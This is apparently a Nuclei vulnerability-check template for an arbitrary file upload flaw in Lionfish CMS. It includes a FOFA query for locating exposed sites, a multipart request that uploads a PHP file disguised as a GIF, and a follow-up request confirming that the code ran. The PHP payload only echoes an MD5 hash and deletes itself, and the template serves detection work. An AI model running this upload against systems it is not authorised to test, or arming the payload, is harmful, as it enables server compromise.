http:
    - extractors:
        - group: 1
          internal: true
          name: path_1
          regex:
            - '"image_o":".*goods\\\/(.*?)\\\/(.*?)"'
          type: regex
        - group: 2
          internal: true
          name: path_2
          regex:
            - '"image_o":".*goods\\\/(.*?)\\\/(.*?)"'
          type: regex
      matchers:
        - condition: and
          part: body_1
          type: word
          words:
            - image_o
        - condition: and
          part: body_2
          type: word
          words:
            - e165421110ba03099a1c0393373c5b43
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
          Host: {{Hostname}}
          Content-type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}

          ------WebKitFormBoundary{{rboundary}}
          Content-Disposition: form-data; name="upfile"; filename="test.php"
          Content-Type: image/gif

          <?php echo md5(233);unlink(__FILE__);?>
          ------WebKitFormBoundary{{rboundary}}--
        - |
          GET /Uploads/image/goods/{{path_1}}/{{path_2}} HTTP/1.1
          Host: {{Hostname}}
id: lionfish-cms-wxapp-php-upload
info:
    author: SleepingBag945
    description: |
        FOFA: body="/seller.php?s=/Public/login"
    name: 狮子鱼 CMS 任意文件上传
    reference:
        - https://www.cnblogs.com/KHZ521/p/14782653.html
    severity: critical
    tags: []
variables:
    rboundary: '{{rand_base(8)}}'
